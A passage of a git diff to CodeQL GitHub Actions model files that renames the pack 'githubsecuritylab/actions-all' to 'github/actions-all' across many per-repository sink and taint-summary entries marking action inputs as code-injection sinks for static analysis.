b/ql/lib/ext/generated/composite-actions/googlecloudplatform_magic-modules.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["googlecloudplatform/magic-modules", "*", "input.repo", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/gravitational_teleport.model.yml b/ql/lib/ext/generated/composite-actions/gravitational_teleport.model.yml index 7f8b87fa20e..e8ed66af89a 100644 --- a/ql/lib/ext/generated/composite-actions/gravitational_teleport.model.yml +++ b/ql/lib/ext/generated/composite-actions/gravitational_teleport.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["gravitational/teleport", "*", "input.target", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/grote_transportr.model.yml b/ql/lib/ext/generated/composite-actions/grote_transportr.model.yml index 31422a708c5..af1327f7d7f 100644 --- a/ql/lib/ext/generated/composite-actions/grote_transportr.model.yml +++ b/ql/lib/ext/generated/composite-actions/grote_transportr.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["grote/transportr", "*", "input.api-level", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/hashicorp_nomad.model.yml b/ql/lib/ext/generated/composite-actions/hashicorp_nomad.model.yml index 30ccfdea631..887743c2c70 100644 --- a/ql/lib/ext/generated/composite-actions/hashicorp_nomad.model.yml +++ b/ql/lib/ext/generated/composite-actions/hashicorp_nomad.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["hashicorp/nomad", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/hashicorp_terraform.model.yml b/ql/lib/ext/generated/composite-actions/hashicorp_terraform.model.yml index 9bc22ac93ef..ff7e51e477a 100644 --- a/ql/lib/ext/generated/composite-actions/hashicorp_terraform.model.yml +++ b/ql/lib/ext/generated/composite-actions/hashicorp_terraform.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["hashicorp/terraform", "*", "input.target-terraform-branch", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/hashicorp_vault.model.yml b/ql/lib/ext/generated/composite-actions/hashicorp_vault.model.yml index 4ec47cb3975..55d0ddfba22 100644 --- a/ql/lib/ext/generated/composite-actions/hashicorp_vault.model.yml +++ b/ql/lib/ext/generated/composite-actions/hashicorp_vault.model.yml @@ -1,12 +1,12 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["hashicorp/vault", "*", "input.destination", "code-injection", "generated"] - ["hashicorp/vault", "*", "input.version", "code-injection", "generated"] - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["hashicorp/vault", "*", "input.vault-version", "output.vault-version", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/home-assistant_android.model.yml b/ql/lib/ext/generated/composite-actions/home-assistant_android.model.yml index 81d137ce547..d4c0823c2ec 100644 --- a/ql/lib/ext/generated/composite-actions/home-assistant_android.model.yml +++ b/ql/lib/ext/generated/composite-actions/home-assistant_android.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["home-assistant/android", "*", "input.lokalise-token", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/homebrew_actions.model.yml b/ql/lib/ext/generated/composite-actions/homebrew_actions.model.yml index 79675d59c05..7d789ec3ccc 100644 --- a/ql/lib/ext/generated/composite-actions/homebrew_actions.model.yml +++ b/ql/lib/ext/generated/composite-actions/homebrew_actions.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["homebrew/actions", "*", "input.casks", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/hyperledger_aries-cloudagent-python.model.yml b/ql/lib/ext/generated/composite-actions/hyperledger_aries-cloudagent-python.model.yml index 3310a67347c..2aa6633d752 100644 --- a/ql/lib/ext/generated/composite-actions/hyperledger_aries-cloudagent-python.model.yml +++ b/ql/lib/ext/generated/composite-actions/hyperledger_aries-cloudagent-python.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["hyperledger/aries-cloudagent-python", "*", "input.TEST_SCOPE", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/hyperledger_fabric-samples.model.yml b/ql/lib/ext/generated/composite-actions/hyperledger_fabric-samples.model.yml index d12963b43db..536e6d914a2 100644 --- a/ql/lib/ext/generated/composite-actions/hyperledger_fabric-samples.model.yml +++ b/ql/lib/ext/generated/composite-actions/hyperledger_fabric-samples.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["hyperledger/fabric-samples", "*", "input.ca-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/igniterealtime_openfire.model.yml b/ql/lib/ext/generated/composite-actions/igniterealtime_openfire.model.yml index 1c63a9e6d0f..45bfb025ac9 100644 --- a/ql/lib/ext/generated/composite-actions/igniterealtime_openfire.model.yml +++ b/ql/lib/ext/generated/composite-actions/igniterealtime_openfire.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["igniterealtime/openfire", "*", "input.domain", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/infracost_actions.model.yml b/ql/lib/ext/generated/composite-actions/infracost_actions.model.yml index e120de812c4..bba69dfc7a0 100644 --- a/ql/lib/ext/generated/composite-actions/infracost_actions.model.yml +++ b/ql/lib/ext/generated/composite-actions/infracost_actions.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["infracost/actions", "*", "input.behavior", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/inspektor-gadget_inspektor-gadget.model.yml b/ql/lib/ext/generated/composite-actions/inspektor-gadget_inspektor-gadget.model.yml index 1be37285c9e..0fbc67e2b1b 100644 --- a/ql/lib/ext/generated/composite-actions/inspektor-gadget_inspektor-gadget.model.yml +++ b/ql/lib/ext/generated/composite-actions/inspektor-gadget_inspektor-gadget.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["inspektor-gadget/inspektor-gadget", "*", "input.runtime", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/intel-analytics_ipex-llm.model.yml b/ql/lib/ext/generated/composite-actions/intel-analytics_ipex-llm.model.yml index aa6e9b684d0..6c6a4264d51 100644 --- a/ql/lib/ext/generated/composite-actions/intel-analytics_ipex-llm.model.yml +++ b/ql/lib/ext/generated/composite-actions/intel-analytics_ipex-llm.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["intel-analytics/ipex-llm", "*", "input.extra-dependency", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ionic-team_ionic-framework.model.yml b/ql/lib/ext/generated/composite-actions/ionic-team_ionic-framework.model.yml index 221aa83de0b..ee18012a8f5 100644 --- a/ql/lib/ext/generated/composite-actions/ionic-team_ionic-framework.model.yml +++ b/ql/lib/ext/generated/composite-actions/ionic-team_ionic-framework.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["ionic-team/ionic-framework", "*", "input.totalShards", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/ionic-team_ionicons.model.yml b/ql/lib/ext/generated/composite-actions/ionic-team_ionicons.model.yml index 71007932427..3dc39052707 100644 --- a/ql/lib/ext/generated/composite-actions/ionic-team_ionicons.model.yml +++ b/ql/lib/ext/generated/composite-actions/ionic-team_ionicons.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["ionic-team/ionicons", "*", "input.paths", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/ionic-team_stencil.model.yml b/ql/lib/ext/generated/composite-actions/ionic-team_stencil.model.yml index bff13b29ecc..b98826b9f02 100644 --- a/ql/lib/ext/generated/composite-actions/ionic-team_stencil.model.yml +++ b/ql/lib/ext/generated/composite-actions/ionic-team_stencil.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["ionic-team/stencil", "*", "input.paths", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/ipfs_aegir.model.yml b/ql/lib/ext/generated/composite-actions/ipfs_aegir.model.yml index 1f75dd81c04..d000c5eb4d5 100644 --- a/ql/lib/ext/generated/composite-actions/ipfs_aegir.model.yml +++ b/ql/lib/ext/generated/composite-actions/ipfs_aegir.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["ipfs/aegir", "*", "input.browser", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/jetbrains_jetbrainsruntime.model.yml b/ql/lib/ext/generated/composite-actions/jetbrains_jetbrainsruntime.model.yml index 15604c34a17..409ef9564d3 100644 --- a/ql/lib/ext/generated/composite-actions/jetbrains_jetbrainsruntime.model.yml +++ b/ql/lib/ext/generated/composite-actions/jetbrains_jetbrainsruntime.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["jetbrains/jetbrainsruntime", "*", "input.debug-suffix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/jhipster_generator-jhipster.model.yml b/ql/lib/ext/generated/composite-actions/jhipster_generator-jhipster.model.yml index aef7f4f6242..60a79604580 100644 --- a/ql/lib/ext/generated/composite-actions/jhipster_generator-jhipster.model.yml +++ b/ql/lib/ext/generated/composite-actions/jhipster_generator-jhipster.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["jhipster/generator-jhipster", "*", "input.generator-path", "code-injection", "generated"] @@ -21,7 +21,7 @@ extensions: - ["jhipster/generator-jhipster", "*", "input.application-path", "code-injection", "generated"] - ["jhipster/generator-jhipster", "*", "input.extra-args", "code-injection", "generated"] - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["jhipster/generator-jhipster", "*", "input.skip-workflow", "output.skip-workflow", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/jsocol_django-ratelimit.model.yml b/ql/lib/ext/generated/composite-actions/jsocol_django-ratelimit.model.yml index f3a26e867ec..4effdea078e 100644 --- a/ql/lib/ext/generated/composite-actions/jsocol_django-ratelimit.model.yml +++ b/ql/lib/ext/generated/composite-actions/jsocol_django-ratelimit.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["jsocol/django-ratelimit", "*", "input.django-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/juicedata_juicefs.model.yml b/ql/lib/ext/generated/composite-actions/juicedata_juicefs.model.yml index 4feab5714c7..d2c44be6261 100644 --- a/ql/lib/ext/generated/composite-actions/juicedata_juicefs.model.yml +++ b/ql/lib/ext/generated/composite-actions/juicedata_juicefs.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["juicedata/juicefs", "*", "input.compress", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/jupyter_docker-stacks.model.yml b/ql/lib/ext/generated/composite-actions/jupyter_docker-stacks.model.yml index 3030f81072a..098782a6bef 100644 --- a/ql/lib/ext/generated/composite-actions/jupyter_docker-stacks.model.yml +++ b/ql/lib/ext/generated/composite-actions/jupyter_docker-stacks.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["jupyter/docker-stacks", "*", "input.variant", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/keycloak_keycloak.model.yml b/ql/lib/ext/generated/composite-actions/keycloak_keycloak.model.yml index 7f8885d1ec7..e08f4ba9bc2 100644 --- a/ql/lib/ext/generated/composite-actions/keycloak_keycloak.model.yml +++ b/ql/lib/ext/generated/composite-actions/keycloak_keycloak.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["keycloak/keycloak", "*", "input.job-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/kserve_kserve.model.yml b/ql/lib/ext/generated/composite-actions/kserve_kserve.model.yml index 93e6b1e0312..97326453158 100644 --- a/ql/lib/ext/generated/composite-actions/kserve_kserve.model.yml +++ b/ql/lib/ext/generated/composite-actions/kserve_kserve.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["kserve/kserve", "*", "input.directory", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/kubeflow_katib.model.yml b/ql/lib/ext/generated/composite-actions/kubeflow_katib.model.yml index 5284159e9db..8f6c13884c5 100644 --- a/ql/lib/ext/generated/composite-actions/kubeflow_katib.model.yml +++ b/ql/lib/ext/generated/composite-actions/kubeflow_katib.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["kubeflow/katib", "*", "input.experiments", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/kubeflow_training-operator.model.yml b/ql/lib/ext/generated/composite-actions/kubeflow_training-operator.model.yml index ac8b8a5150a..f7f2f139e85 100644 --- a/ql/lib/ext/generated/composite-actions/kubeflow_training-operator.model.yml +++ b/ql/lib/ext/generated/composite-actions/kubeflow_training-operator.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["kubeflow/training-operator", "*", "input.context", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/kubernetes-sigs_karpenter.model.yml b/ql/lib/ext/generated/composite-actions/kubernetes-sigs_karpenter.model.yml index 19e9448994e..11b423e871c 100644 --- a/ql/lib/ext/generated/composite-actions/kubernetes-sigs_karpenter.model.yml +++ b/ql/lib/ext/generated/composite-actions/kubernetes-sigs_karpenter.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["kubernetes-sigs/karpenter", "*", "input.k8sVersion", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/kubernetes-sigs_kwok.model.yml b/ql/lib/ext/generated/composite-actions/kubernetes-sigs_kwok.model.yml index 82c5713f943..954b2d05858 100644 --- a/ql/lib/ext/generated/composite-actions/kubernetes-sigs_kwok.model.yml +++ b/ql/lib/ext/generated/composite-actions/kubernetes-sigs_kwok.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["kubernetes-sigs/kwok", "*", "input.command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/kubescape_kubescape.model.yml b/ql/lib/ext/generated/composite-actions/kubescape_kubescape.model.yml index 2d4108331b9..6cdb74f1278 100644 --- a/ql/lib/ext/generated/composite-actions/kubescape_kubescape.model.yml +++ b/ql/lib/ext/generated/composite-actions/kubescape_kubescape.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["kubescape/kubescape", "*", "input.ORIGINAL_TAG", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/kubeshop_botkube.model.yml b/ql/lib/ext/generated/composite-actions/kubeshop_botkube.model.yml index ccd49962fa4..e6820c900e3 100644 --- a/ql/lib/ext/generated/composite-actions/kubeshop_botkube.model.yml +++ b/ql/lib/ext/generated/composite-actions/kubeshop_botkube.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["kubeshop/botkube", "*", "input.username", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/kyverno_kyverno.model.yml b/ql/lib/ext/generated/composite-actions/kyverno_kyverno.model.yml index a7e56c8626d..ba3ad6e8b0c 100644 --- a/ql/lib/ext/generated/composite-actions/kyverno_kyverno.model.yml +++ b/ql/lib/ext/generated/composite-actions/kyverno_kyverno.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["kyverno/kyverno", "*", "input.version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/lancedb_lance.model.yml b/ql/lib/ext/generated/composite-actions/lancedb_lance.model.yml index 4c0df425e45..114b8ce168e 100644 --- a/ql/lib/ext/generated/composite-actions/lancedb_lance.model.yml +++ b/ql/lib/ext/generated/composite-actions/lancedb_lance.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["lancedb/lance", "*", "input.repo", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/launchdarkly_ios-client-sdk.model.yml b/ql/lib/ext/generated/composite-actions/launchdarkly_ios-client-sdk.model.yml index a69f2303dbe..834353d89a8 100644 --- a/ql/lib/ext/generated/composite-actions/launchdarkly_ios-client-sdk.model.yml +++ b/ql/lib/ext/generated/composite-actions/launchdarkly_ios-client-sdk.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["launchdarkly/ios-client-sdk", "*", "input.ios-sim", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/layer5labs_meshmap-snapshot.model.yml b/ql/lib/ext/generated/composite-actions/layer5labs_meshmap-snapshot.model.yml index c2c87969e93..1c903d71cbe 100644 --- a/ql/lib/ext/generated/composite-actions/layer5labs_meshmap-snapshot.model.yml +++ b/ql/lib/ext/generated/composite-actions/layer5labs_meshmap-snapshot.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["layer5labs/meshmap-snapshot", "*", "input.assetLocation", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/ldc-developers_ldc.model.yml b/ql/lib/ext/generated/composite-actions/ldc-developers_ldc.model.yml index c1c3bf433cd..c34200337f2 100644 --- a/ql/lib/ext/generated/composite-actions/ldc-developers_ldc.model.yml +++ b/ql/lib/ext/generated/composite-actions/ldc-developers_ldc.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["ldc-developers/ldc", "*", "input.cmake_flags", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/ledgerhq_ledger-live.model.yml b/ql/lib/ext/generated/composite-actions/ledgerhq_ledger-live.model.yml index af21dca8205..19d14bbe988 100644 --- a/ql/lib/ext/generated/composite-actions/ledgerhq_ledger-live.model.yml +++ b/ql/lib/ext/generated/composite-actions/ledgerhq_ledger-live.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["ledgerhq/ledger-live", "*", "input.os", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/lerna_lerna.model.yml b/ql/lib/ext/generated/composite-actions/lerna_lerna.model.yml index 18fdeffe1ec..0308c934d7e 100644 --- a/ql/lib/ext/generated/composite-actions/lerna_lerna.model.yml +++ b/ql/lib/ext/generated/composite-actions/lerna_lerna.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["lerna/lerna", "*", "input.install-command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/lf-edge_eve.model.yml b/ql/lib/ext/generated/composite-actions/lf-edge_eve.model.yml index ee67e882174..6039a6c3628 100644 --- a/ql/lib/ext/generated/composite-actions/lf-edge_eve.model.yml +++ b/ql/lib/ext/generated/composite-actions/lf-edge_eve.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["lf-edge/eve", "*", "input.command", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/libgit2_libgit2.model.yml b/ql/lib/ext/generated/composite-actions/libgit2_libgit2.model.yml index 49caeb5f1dc..4962f4f6281 100644 --- a/ql/lib/ext/generated/composite-actions/libgit2_libgit2.model.yml +++ b/ql/lib/ext/generated/composite-actions/libgit2_libgit2.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["libgit2/libgit2", "*", "input.command", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/lightning-ai_pytorch-lightning.model.yml b/ql/lib/ext/generated/composite-actions/lightning-ai_pytorch-lightning.model.yml index dda74b285da..91c9e22df2a 100644 --- a/ql/lib/ext/generated/composite-actions/lightning-ai_pytorch-lightning.model.yml +++ b/ql/lib/ext/generated/composite-actions/lightning-ai_pytorch-lightning.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["lightning-ai/pytorch-lightning", "*", "input.name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/lightning-ai_torchmetrics.model.yml b/ql/lib/ext/generated/composite-actions/lightning-ai_torchmetrics.model.yml index 4b144103f8f..760858b7eec 100644 --- a/ql/lib/ext/generated/composite-actions/lightning-ai_torchmetrics.model.yml +++ b/ql/lib/ext/generated/composite-actions/lightning-ai_torchmetrics.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["lightning-ai/torchmetrics", "*", "input.pypi-dir", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/linkerd_linkerd2.model.yml b/ql/lib/ext/generated/composite-actions/linkerd_linkerd2.model.yml index 931658c0bb5..8d219108234 100644 --- a/ql/lib/ext/generated/composite-actions/linkerd_linkerd2.model.yml +++ b/ql/lib/ext/generated/composite-actions/linkerd_linkerd2.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["linkerd/linkerd2", "*", "input.component", "code-injection", "generated"] @@ -8,7 +8,7 @@ extensions: - ["linkerd/linkerd2", "*", "input.docker-ghcr-username", "code-injection", "generated"] - ["linkerd/linkerd2", "*", "input.docker-ghcr-pat", "code-injection", "generated"] - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["linkerd/linkerd2", "*", "input.component", "output.image", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/logseq_publish-spa.model.yml b/ql/lib/ext/generated/composite-actions/logseq_publish-spa.model.yml index f2963217662..e889a394563 100644 --- a/ql/lib/ext/generated/composite-actions/logseq_publish-spa.model.yml +++ b/ql/lib/ext/generated/composite-actions/logseq_publish-spa.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["logseq/publish-spa", "*", "input.accent-color", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/macvim-dev_macvim.model.yml b/ql/lib/ext/generated/composite-actions/macvim-dev_macvim.model.yml index 1578e397369..8f96daba8df 100644 --- a/ql/lib/ext/generated/composite-actions/macvim-dev_macvim.model.yml +++ b/ql/lib/ext/generated/composite-actions/macvim-dev_macvim.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["macvim-dev/macvim", "*", "input.contents", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/mamba-org_mamba.model.yml b/ql/lib/ext/generated/composite-actions/mamba-org_mamba.model.yml index 17c45e0d8ed..1e73f98b3d3 100644 --- a/ql/lib/ext/generated/composite-actions/mamba-org_mamba.model.yml +++ b/ql/lib/ext/generated/composite-actions/mamba-org_mamba.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["mamba-org/mamba", "*", "input.key_suffix", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/maplibre_maplibre-native.model.yml b/ql/lib/ext/generated/composite-actions/maplibre_maplibre-native.model.yml index 4e26b872800..c92eb434d47 100644 --- a/ql/lib/ext/generated/composite-actions/maplibre_maplibre-native.model.yml +++ b/ql/lib/ext/generated/composite-actions/maplibre_maplibre-native.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["maplibre/maplibre-native", "*", "input.artifact-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/mastodon_mastodon.model.yml b/ql/lib/ext/generated/composite-actions/mastodon_mastodon.model.yml index d5fa53d1bbb..9de3892ac0c 100644 --- a/ql/lib/ext/generated/composite-actions/mastodon_mastodon.model.yml +++ b/ql/lib/ext/generated/composite-actions/mastodon_mastodon.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["mastodon/mastodon", "*", "input.additional-system-dependencies", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/mavlink_qgroundcontrol.model.yml b/ql/lib/ext/generated/composite-actions/mavlink_qgroundcontrol.model.yml index f90fb1c5e63..2ae0b823187 100644 --- a/ql/lib/ext/generated/composite-actions/mavlink_qgroundcontrol.model.yml +++ b/ql/lib/ext/generated/composite-actions/mavlink_qgroundcontrol.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["mavlink/qgroundcontrol", "*", "input.aws_secret_access_key", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/mdanalysis_mdanalysis.model.yml b/ql/lib/ext/generated/composite-actions/mdanalysis_mdanalysis.model.yml index d16c0792c6d..8e2744b2de7 100644 --- a/ql/lib/ext/generated/composite-actions/mdanalysis_mdanalysis.model.yml +++ b/ql/lib/ext/generated/composite-actions/mdanalysis_mdanalysis.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["mdanalysis/mdanalysis", "*", "input.extra-pip-deps", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/medic_cht-core.model.yml b/ql/lib/ext/generated/composite-actions/medic_cht-core.model.yml index 4d009c2d47d..bf2e23efba8 100644 --- a/ql/lib/ext/generated/composite-actions/medic_cht-core.model.yml +++ b/ql/lib/ext/generated/composite-actions/medic_cht-core.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["medic/cht-core", "*", "input.hostname", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/medusajs_medusa.model.yml b/ql/lib/ext/generated/composite-actions/medusajs_medusa.model.yml index afd875c2205..d8d86591302 100644 --- a/ql/lib/ext/generated/composite-actions/medusajs_medusa.model.yml +++ b/ql/lib/ext/generated/composite-actions/medusajs_medusa.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["medusajs/medusa", "*", "input.pathToSeedData", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/metabase_metabase.model.yml b/ql/lib/ext/generated/composite-actions/metabase_metabase.model.yml index 680bbe27bcb..1ac30a3790e 100644 --- a/ql/lib/ext/generated/composite-actions/metabase_metabase.model.yml +++ b/ql/lib/ext/generated/composite-actions/metabase_metabase.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["metabase/metabase", "*", 